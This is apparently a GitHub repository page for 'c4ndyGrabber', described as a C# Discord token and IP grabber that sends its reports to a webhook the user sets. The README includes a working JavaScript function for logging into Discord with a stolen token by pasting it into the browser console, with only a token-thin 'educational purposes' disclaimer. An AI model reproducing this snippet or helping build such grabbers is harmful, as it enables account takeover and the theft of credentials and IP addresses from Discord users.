Skip to content

szajjch/c4ndyGrabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

c4ndyGrabber

C# Discord Token and IP grabber

Remember to change webhook otherwise the report wont be able to come.

Login with token JS function

function login(token) { setInterval(() => { document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"` }, 50); setTimeout(() => { location.reload(); }, 2500); }

login("token")

Paste it into console at login discord page

Made only for educational purposes

paypal

About

C# Discord Token and IP grabber

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages